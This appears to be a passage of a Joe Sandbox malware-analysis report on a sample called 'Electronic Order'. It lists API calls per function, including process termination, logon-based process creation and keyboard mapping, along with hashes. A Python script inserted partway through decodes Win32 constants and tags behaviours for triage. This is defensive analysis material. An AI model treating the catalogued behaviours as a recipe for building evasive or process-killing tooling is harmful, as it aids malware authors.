                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E18B8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: 3e2d78d8297006c73f8d51de0217d4d6a887afcf8a5283447b61fa216b87004b
                                      • Instruction ID: 2c6b1711eaef5ce6cc964488f4bbcb64466fb9a0940803011a28f6705ec38e1e
                                      • Opcode Fuzzy Hash: 3e2d78d8297006c73f8d51de0217d4d6a887afcf8a5283447b61fa216b87004b
                                      • Instruction Fuzzy Hash: 531189BA504209AFDF018FA5ED49FDA7BA9EF49708F045025FE04B2060C7768DA5EB60
                                      APIs
                                        • Part of subcall function 00DC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC134D
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC135C
                                        • Part of subcall function 00DC12F3: BeginPath.GDI32(?), ref: 00DC1373
                                        • Part of subcall function 00DC12F3: SelectObject.GDI32(?,00000000), ref: 00DC139C
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E4C1C4
                                      • LineTo.GDI32(00000000,00000003,?), ref: 00E4C1D8
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4C1E6
                                      • LineTo.GDI32(00000000,00000000,?), ref: 00E4C1F6
                                      • EndPath.GDI32(00000000), ref: 00E4C206
                                      • StrokePath.GDI32(00000000), ref: 00E4C216
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 23f04778486245c8e29506376d2ae905ed0ddf12db38f5cfc4c50c21886ce23f
                                      • Instruction ID: 4101a3445a609198a89b8a25da1b3929eb7eb6f0eb8e619ef0922d4fa426d47e
                                      • Opcode Fuzzy Hash: 23f04778486245c8e29506376d2ae905ed0ddf12db38f5cfc4c50c21886ce23f
                                      • Instruction Fuzzy Hash: 7A111B7A40014DBFDF119F91EC88FAA7FADEB09354F048021FA186A162C7B19D59DBA0
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE03D3
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DE03DB
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DE03E6
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DE03F1
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DE03F9
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE0401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 7a8607281c51e1e925a83036a6b11267b3cd1adef2f7017f3d4dcb518da5aa9e
                                      • Instruction ID: fad603145508c08e3093f60d611cef4c7c459242fa10b0caaf3f6b676c3f6fd6
                                      • Opcode Fuzzy Hash: 7a8607281c51e1e925a83036a6b11267b3cd1adef2f7017f3d4dcb518da5aa9e
                                      • Instruction Fuzzy Hash: 9F016CB09027597DE3008F5A8C85B52FFA8FF19754F00415BE15C47941C7F5A868CBE5
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E2569B
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E256B1
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00E256C0
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256CF
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256D9
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: 294f83ce871208edbb75ffe1bc569bc80dc5e8588417aab6112d41d680116477
                                      • Instruction ID: d8adb0f239460f1b03c5a74e88596cff695267e07fbe04e96057d49b65332dbf
                                      • Opcode Fuzzy Hash: 294f83ce871208edbb75ffe1bc569bc80dc5e8588417aab6112d41d680116477
                                      • Instruction Fuzzy Hash: 34F06D36241158BFE3205BA3AC0DEAB7A7CEBC7F11F0001A9FA00E105196A01A0686B5
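The API listings in this report print every argument as raw hex, so the interesting values (WM_CLOSE, PROCESS_ALL_ACCESS, the mouse_event flag mask, the modifier virtual-key codes passed to MapVirtualKeyW) have to be decoded by hand. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses bullets in exactly the format shown above ("• Api.MODULE(args), ref: ADDR", with the "Part of subcall function" prefix for callee calls), resolves the standard Win32 constants by API and argument position, and tags call sets such as the PostMessageW / SendMessageTimeoutW / OpenProcess / TerminateProcess sequence. The constant values are the documented Win32 ones; the behaviour labels, and the remark that the first set is what AutoIt's WinKill() does, are this example's own inference and are not stated by the report. The sample input is constructed from bullets copied out of the entries above.

```python
"""Added example: parse Joe Sandbox "• Api.MODULE(args), ref: ADDR" bullets
and resolve the Win32 constants a triager wants to see by name."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "Part of subcall function X:" marks calls made by a callee; entries such as
# "_memcmp.LIBCMT ref: ..." carry no argument list at all.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

# Standard Win32 values, keyed by (API, zero-based argument index).
_CONST = {
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("SendMessageW", 1): {0x130C: "TCM_SETCURSEL"},
    ("ShowWindow", 1): {0: "SW_HIDE", 4: "SW_SHOWNOACTIVATE"},
    ("GetTokenInformation", 1): {2: "TokenGroups"},
    ("MapVirtualKeyW", 0): {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                            0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"},
}
# mouse_event dwFlags is a bit mask and is decoded bit by bit.
_MOUSE_FLAGS = {0x0001: "MOUSEEVENTF_MOVE", 0x0002: "MOUSEEVENTF_LEFTDOWN",
                0x0004: "MOUSEEVENTF_LEFTUP", 0x8000: "MOUSEEVENTF_ABSOLUTE"}
# Behaviour labels are this example's reading of the call sets, not the
# report's (the first set is what AutoIt's WinKill() does; an inference).
_BEHAVIOURS = [
    ("window force-close then TerminateProcess",
     {"PostMessageW", "GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"}),
    ("process creation with explicit credentials", {"CreateProcessWithLogonW"}),
    ("synthetic mouse input", {"mouse_event"}),
    ("modifier-key mapping for synthetic keyboard input", {"MapVirtualKeyW"}),
]


@dataclass
class Call:
    api: str
    module: str
    args: list                 # int per argument, None where the report shows "?"
    ref: str                   # call-site address
    subcall: Optional[str] = None
    resolved: dict = field(default_factory=dict)   # arg index -> constant name


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)   # also parses "-00000002"


def parse_listing(text: str) -> list:
    """One Call per bullet line; lines that are not call bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        args = [] if m["args"] is None else [_parse_arg(t) for t in m["args"].split(",")]
        call = Call(m["api"], m["mod"], args, m["ref"], m["sub"])
        for i, value in enumerate(args):
            if value is None:
                continue
            if call.api == "mouse_event" and i == 0:
                bits = [n for bit, n in sorted(_MOUSE_FLAGS.items()) if value & bit]
                call.resolved[i] = "|".join(bits) or hex(value)
            elif (name := _CONST.get((call.api, i), {}).get(value)):
                call.resolved[i] = name
        calls.append(call)
    return calls


def describe(call: Call) -> str:
    """Render a call with names substituted, e.g. OpenProcess(PROCESS_ALL_ACCESS,0x0,?,...)."""
    shown = [call.resolved.get(i, "?" if a is None else hex(a)) for i, a in enumerate(call.args)]
    return f"{call.ref} {call.api}({','.join(shown)})"


def tag_behaviours(calls: list) -> list:
    """Labels whose whole API set occurs among the function's own (non-subcall) calls."""
    seen = {c.api for c in calls if c.subcall is None}
    return [label for label, needed in _BEHAVIOURS if needed <= seen]


# Constructed sample: bullets copied from the report entries above and joined
# into one listing so that several behaviours show up together.
SAMPLE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E2569B
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E256B1
• GetWindowThreadProcessId.USER32(?,?), ref: 00E256C0
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256CF
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E256D9
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E37422
  • Part of subcall function 00E254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE03D3
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E18B7A
• _memcmp.LIBCMT ref: 00E17C90
"""

if __name__ == "__main__":
    for c in parse_listing(SAMPLE):
        print(describe(c))
    print("behaviours:", tag_behaviours(parse_listing(SAMPLE)))
```

Only the arguments the sandbox actually recovered are resolved; a "?" stays a "?", and the trailing stack residue the plugin prints after the real parameters (the repeated 00000010,00000002,000001F4 values on the OpenProcess and TerminateProcess lines) is left as hex rather than guessed at. Subcall lines are parsed but excluded from behaviour tagging, so a Sleep() inside a helper does not get attributed to the calling function.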
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00E274E5
                                      • EnterCriticalSection.KERNEL32(?,?,00DD1044,?,?), ref: 00E274F6
                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00DD1044,?,?), ref: 00E27503
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00DD1044,?,?), ref: 00E27510
                                        • Part of subcall function 00E26ED7: CloseHandle.KERNEL32(00000000,?,00E2751D,?,00DD1044,?,?), ref: 00E26EE1
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E27523
                                      • LeaveCriticalSection.KERNEL32(?,?,00DD1044,?,?), ref: 00E2752A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: ffbb917c861d475d27f56b2c38309f3375269ffb4b54151bfe0609a075f66f6f
                                      • Instruction ID: 111a62710f17d7ef2d2d97668a75b46517226ae2fc39bb92bc5753480ad4c6d2
                                      • Opcode Fuzzy Hash: ffbb917c861d475d27f56b2c38309f3375269ffb4b54151bfe0609a075f66f6f
                                      • Instruction Fuzzy Hash: 10F05E3E540A22EFEB111B65FC8C9EB776AEF46B02B001531F602B10B1CBB55906CB54
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E18E7F
                                      • UnloadUserProfile.USERENV(?,?), ref: 00E18E8B
                                      • CloseHandle.KERNEL32(?), ref: 00E18E94
                                      • CloseHandle.KERNEL32(?), ref: 00E18E9C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E18EA5
                                      • HeapFree.KERNEL32(00000000), ref: 00E18EAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 79e54bb73e72a93563807899bbe13a6b078f6c5da9605a5b378bea5a1d8e56f1
                                      • Instruction ID: ddc7595a3c5debe27343e73dc1c7b3b26dfc140c251f054a50ea0752258c9135
                                      • Opcode Fuzzy Hash: 79e54bb73e72a93563807899bbe13a6b078f6c5da9605a5b378bea5a1d8e56f1
                                      • Instruction Fuzzy Hash: 3BE0C23A004001FFDA011FE2EC0C90ABBA9FB8AB22B108231F219A1571CB32942ADB50
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E52C7C,?), ref: 00E17C32
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E52C7C,?), ref: 00E17C4A
                                      • CLSIDFromProgID.OLE32(?,?,00000000,00E4FB80,000000FF,?,00000000,00000800,00000000,?,00E52C7C,?), ref: 00E17C6F
                                      • _memcmp.LIBCMT ref: 00E17C90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID: ,,
                                      • API String ID: 314563124-1556401989
                                      • Opcode ID: 8ef31edc093d60177ea2f69178d91880a47ddb8a0b3ff14efbffff7b528786fc
                                      • Instruction ID: 7516fff94688a0366f29c177c00b6547b998b52274db05aff1e9c073fd7791a9
                                      • Opcode Fuzzy Hash: 8ef31edc093d60177ea2f69178d91880a47ddb8a0b3ff14efbffff7b528786fc
                                      • Instruction Fuzzy Hash: D4812A76A04109EFCB04DF94C884EEEB7B9FF89715F204198E546BB250DB31AE46CB60
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00E38928
                                      • CharUpperBuffW.USER32(?,?), ref: 00E38A37
                                      • VariantClear.OLEAUT32(?), ref: 00E38BAF
                                        • Part of subcall function 00E27804: VariantInit.OLEAUT32(00000000), ref: 00E27844
                                        • Part of subcall function 00E27804: VariantCopy.OLEAUT32(00000000,?), ref: 00E2784D
                                        • Part of subcall function 00E27804: VariantClear.OLEAUT32(00000000), ref: 00E27859
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: 1315fcc3d6228d7fc5024550b85ea0e5842ce45ea1464a63bbd6e11435d94cfe
                                      • Instruction ID: 7edae620b705d002e9b25eb6e435f9c148f3d7e0ed534d336dbee036116c8f70
                                      • Opcode Fuzzy Hash: 1315fcc3d6228d7fc5024550b85ea0e5842ce45ea1464a63bbd6e11435d94cfe
                                      • Instruction Fuzzy Hash: 6D91AF746083029FC710DF24C588E5ABBE4EFC8704F14996EF89A9B361DB31E945CB62
                                      APIs
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                      • _memset.LIBCMT ref: 00E23077
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E230A6
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E23159
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E23187
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: db4df88e99f5e599ce6148995c9054e5bf72b34c18579796cba2fc14039a3d46
                                      • Instruction ID: aacac3739eca154b2e401000a5586ea5da38a162158fa501eb2b3751fcbcd81e
                                      • Opcode Fuzzy Hash: db4df88e99f5e599ce6148995c9054e5bf72b34c18579796cba2fc14039a3d46
                                      • Instruction Fuzzy Hash: F651E1316093609ED725AF38E845A6BB7E4EF85314F041A2DF885F3191DB78CE548B62
                                      APIs
                                      • _memset.LIBCMT ref: 00E22CAF
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E22CCB
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E22D11
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E86890,00000000), ref: 00E22D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 7b8f268537fd8c0fa0413f7266c0c5d5fe848544dd0cb16a6682121b67af59a1
                                      • Instruction ID: 9cb72ea3ca719c0a7ff31c2693965b306cdbb7c3def2010ca027bcce8f78cb4a
                                      • Opcode Fuzzy Hash: 7b8f268537fd8c0fa0413f7266c0c5d5fe848544dd0cb16a6682121b67af59a1
                                      • Instruction Fuzzy Hash: B441C130204312AFD724DF24E845B5BBBE8EF85324F00461DFA65A72E1DB70E905CBA2
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E3DAD9
                                        • Part of subcall function 00DC79AB: _memmove.LIBCMT ref: 00DC79F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharLower_memmove
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 3425801089-567219261
                                      • Opcode ID: 1e1adf7c760cb5242f0dacc520013de4a40c481314545457351d10f0c3b242c8
                                      • Instruction ID: c43cd1b00141bbefad64ced34415a69909ed4c6a1e57def2ce22772583f39a75
                                      • Opcode Fuzzy Hash: 1e1adf7c760cb5242f0dacc520013de4a40c481314545457351d10f0c3b242c8
                                      • Instruction Fuzzy Hash: 6731A17090421AAFCF00EF94DC819EEF7B4FF45324F108629E865A76D1CB71A905CBA0
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E193F6
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E19409
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E19439
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove$ClassName
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 365058703-1403004172
                                      • Opcode ID: b92a0ab68be51bb5a9a9ab383b9aa5b1358fa89cc57c183b03a2bcc7a58c40b6
                                      • Instruction ID: afd20c476b48ebfccb6036bc3d517db7b97f0d66dcf2ef4ec2fe75fa3e77b7be
                                      • Opcode Fuzzy Hash: b92a0ab68be51bb5a9a9ab383b9aa5b1358fa89cc57c183b03a2bcc7a58c40b6
                                      • Instruction Fuzzy Hash: C7210471900104BEDB14ABB1DC95DFFB778DF05750B105119F836B71E2DB34198A9A30
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DFD5EC
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • _memset.LIBCMT ref: 00DC418D
                                      • _wcscpy.LIBCMT ref: 00DC41E1
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DC41F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                      • String ID: Line:
                                      • API String ID: 3942752672-1585850449
                                      • Opcode ID: e5aaa215f1ff02ece642e4261f0442955a1c8eef62c02d7030f143a514f7bf72
